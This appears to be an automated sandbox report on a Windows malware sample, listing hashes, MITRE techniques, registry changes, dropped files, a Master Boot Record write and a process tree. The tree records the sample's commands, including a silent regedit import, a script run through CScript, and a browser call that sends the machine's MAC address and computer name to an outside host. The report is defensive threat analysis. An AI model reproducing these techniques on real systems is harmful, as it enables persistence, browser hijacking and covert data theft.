166d04f845fc5460233eb6f7b0510a69ff2d90bd6ae8062453097d4878c3b97b

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
25-06-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
Size

895KB
MD5

0d68d0b728c15702de28772dadc20f09
SHA1

52e64a2204b7c694c51c77cf906b460da3464503
SHA256

166d04f845fc5460233eb6f7b0510a69ff2d90bd6ae8062453097d4878c3b97b
SHA512

012461fef1360d50343b4baf3c70391a9fa63b1f5af4f12cb6c865c20d0bdf4748316654dc21aa950ac39649522f5142a1016cb9aac17616ecab77f4c951dc22
SSDEEP

12288:dZjMLf11MmPQeRXEHYYS3gA0FJO1t3r6QJ3LdXWcmfnGA2feMe3JZJ7kASbla:dafIiy4NwdLpQJZXWgcpJZJAVa

Score

10^/10

bootkit evasion persistence upx

Malware Config

Signatures

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
2396	baidu.exe
2700	SeFastInstall2_3214.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0037000000014749-5.dat	upx
behavioral1/memory/2396-19-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/files/0x0008000000014b9e-22.dat	upx
behavioral1/memory/2700-23-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral1/memory/2396-54-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral1/memory/2700-55-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral1/memory/2700-56-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral1/memory/2396-60-0x0000000000400000-0x0000000000429000-memory.dmp	upx

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	SeFastInstall2_3214.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\pack.wsf	baidu.exe
File opened for modification	C:\Program Files\shfnlpbag.qbhxe	Cmd.exe
File created	C:\Program Files\Common Files\tk.reg	baidu.exe
File opened for modification	C:\Program Files\shfnlpbag.qbhxe	baidu.exe
File created	C:\Program Files\1_shfnlpbag.qbhxe	baidu.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	baidu.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 42 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Local Page = "c:\\about blank.htm"	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000760f6fb6d7365248881a38bcea68cf8b00000000020000000000106600000001000020000000857bed382a44c7ecb4c0eb9a7192a5027b600c56b8db5e4cbc2fe2af248d0bc1000000000e8000000002000020000000066d532893502c3f0db9c1a1e245d72bbcb4738e914221b806232c5076223727900000002dc106308cecd28e963e85c11676edca6af11ab47a7f419b671e18a994ff75750fda3c503e576c04d9c5a9c2fe7200af33baa4f3dd44e62ab1b8fbfa1116d84c72a40d4f68b8e6ccee028f4b828e09f0e4f331d7cee7a6ae4aa64a79ebabf70737cb937e37837e6e9e47a36fef1658444389e9b701036bd11cfe11ca3604358cb21f72cb290a49c090f2dd099764c84d40000000e83d6733f7d1a302da4592742105f2b6d4e43099422c1e7afc931c1ad71d59908cafdbb4115b4ccb1b7e3284992b0fcc4ef14f19aa3c1213c55510d1c660ddab	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000760f6fb6d7365248881a38bcea68cf8b00000000020000000000106600000001000020000000661c55f1d75a20072b7e354db080eb7067a60ca04924bdbcd17c11ba5d7cfacc000000000e8000000002000020000000c49704f995121f303cef3e0e3139012876f775126cafb8459fd6110a9c0aaa12200000008805848fe9e0438fc0d190dd173eec38a8df369b49769be6c001f33e6e40d9e540000000930807671516bf5c8961b73cf659455a12840037f0b522a78ef2f2dab9b90db51d3c6c9d1fda409074471f9c56acfcff13ca53b07ec758fdb3cfa8ff0fa054b0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{78472151-32CE-11EF-8D12-66A5A0AB388F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0e33e4fdbc6da01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425466673"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm"	WScript.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm"	WScript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\IconHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\ = "open"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\ = "????"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptEngine	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command\ = "WScript.exe \"C:\\Program Files\\shfnlpbag.qbhxe\" \"%1\""	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Print\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe /p %1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers\	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ = "Internet Explorer"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\Command\ = "C:\\Windows\\SysWow64\\CScript.exe \"%1\" %*"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink\ = "Inkfile"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\ = "Open &with Command Prompt"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc\ = "qcfile"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2432	regedit.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2160	iexplore.exe
2160	iexplore.exe
2160	iexplore.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
2396	baidu.exe
2160	iexplore.exe
2160	iexplore.exe
2700	SeFastInstall2_3214.exe
3068	IEXPLORE.EXE
3068	IEXPLORE.EXE
2160	iexplore.exe
2160	iexplore.exe
2488	IEXPLORE.EXE
2488	IEXPLORE.EXE
2488	IEXPLORE.EXE
2488	IEXPLORE.EXE
2160	iexplore.exe
2160	iexplore.exe
2348	IEXPLORE.EXE
2348	IEXPLORE.EXE
2348	IEXPLORE.EXE
2348	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 836 wrote to memory of 2396	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	28
PID 836 wrote to memory of 2396	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	28
PID 836 wrote to memory of 2396	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	28
PID 836 wrote to memory of 2396	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	28
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2700	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	29
PID 836 wrote to memory of 2160	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	30
PID 836 wrote to memory of 2160	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	30
PID 836 wrote to memory of 2160	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	30
PID 836 wrote to memory of 2160	836	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	30
PID 2160 wrote to memory of 3068	2160	iexplore.exe	32
PID 2160 wrote to memory of 3068	2160	iexplore.exe	32
PID 2160 wrote to memory of 3068	2160	iexplore.exe	32
PID 2160 wrote to memory of 3068	2160	iexplore.exe	32
PID 2396 wrote to memory of 2644	2396	baidu.exe	31
PID 2396 wrote to memory of 2644	2396	baidu.exe	31
PID 2396 wrote to memory of 2644	2396	baidu.exe	31
PID 2396 wrote to memory of 2644	2396	baidu.exe	31
PID 2644 wrote to memory of 2432	2644	cmd.exe	34
PID 2644 wrote to memory of 2432	2644	cmd.exe	34
PID 2644 wrote to memory of 2432	2644	cmd.exe	34
PID 2644 wrote to memory of 2432	2644	cmd.exe	34
PID 2396 wrote to memory of 2500	2396	baidu.exe	35
PID 2396 wrote to memory of 2500	2396	baidu.exe	35
PID 2396 wrote to memory of 2500	2396	baidu.exe	35
PID 2396 wrote to memory of 2500	2396	baidu.exe	35
PID 2500 wrote to memory of 2808	2500	Cmd.exe	37
PID 2500 wrote to memory of 2808	2500	Cmd.exe	37
PID 2500 wrote to memory of 2808	2500	Cmd.exe	37
PID 2500 wrote to memory of 2808	2500	Cmd.exe	37
PID 2396 wrote to memory of 316	2396	baidu.exe	39
PID 2396 wrote to memory of 316	2396	baidu.exe	39
PID 2396 wrote to memory of 316	2396	baidu.exe	39
PID 2396 wrote to memory of 316	2396	baidu.exe	39
PID 316 wrote to memory of 1852	316	WScript.exe	40
PID 316 wrote to memory of 1852	316	WScript.exe	40
PID 316 wrote to memory of 1852	316	WScript.exe	40
PID 316 wrote to memory of 1852	316	WScript.exe	40
PID 2160 wrote to memory of 2488	2160	iexplore.exe	41
PID 2160 wrote to memory of 2488	2160	iexplore.exe	41
PID 2160 wrote to memory of 2488	2160	iexplore.exe	41
PID 2160 wrote to memory of 2488	2160	iexplore.exe	41
PID 2396 wrote to memory of 1340	2396	baidu.exe	45
PID 2396 wrote to memory of 1340	2396	baidu.exe	45
PID 2396 wrote to memory of 1340	2396	baidu.exe	45
PID 2396 wrote to memory of 1340	2396	baidu.exe	45
PID 2160 wrote to memory of 2348	2160	iexplore.exe	47
PID 2160 wrote to memory of 2348	2160	iexplore.exe	47
PID 2160 wrote to memory of 2348	2160	iexplore.exe	47
PID 2160 wrote to memory of 2348	2160	iexplore.exe	47
PID 2396 wrote to memory of 1136	2396	baidu.exe	46
PID 2396 wrote to memory of 1136	2396	baidu.exe	46
PID 2396 wrote to memory of 1136	2396	baidu.exe	46
PID 2396 wrote to memory of 1136	2396	baidu.exe	46

C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:836
- C:\baidu.exe
  C:\baidu.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s "C:\Program Files\Common Files\tk.reg"
      4⤵
      Modifies registry class
      Runs .reg file with regedit
      PID:2432
- - C:\Windows\SysWOW64\Cmd.exe
    Cmd.exe /c CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_shfnlpbag.qbhxe" >> "C:\Program Files\shfnlpbag.qbhxe"
    3⤵
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\SysWOW64\cscript.exe
      CScript /nologo "C:\Program Files\pack.wsf" "C:\Program Files\1_shfnlpbag.qbhxe"
      4⤵
      PID:2808
- - C:\Windows\SysWow64\WScript.exe
    "C:\Windows\SysWow64\WScript.exe" "C:\Program Files\shfnlpbag.qbhxe"
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Modifies Internet Explorer settings
    - Modifies Internet Explorer start page
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:316
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.54600.com/?byme
      4⤵
      PID:1852
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=66:A5:A0:AB:38:8F&a_cpname=PUMARTNR&a_user=byme&a_locip=0.0.0.0
    3⤵
    PID:1340
- - \??\c:\windows\SysWOW64\wscript.exe
    c:\windows\system32\wscript.exe C:\\Killme.vbs
    3⤵
    PID:1136
- C:\SeFastInstall2_3214.exe
  C:\SeFastInstall2_3214.exe
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:2700
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.1234.la/an.htm?qqchang
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3068
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:406533 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2488
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275474 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2348

Network

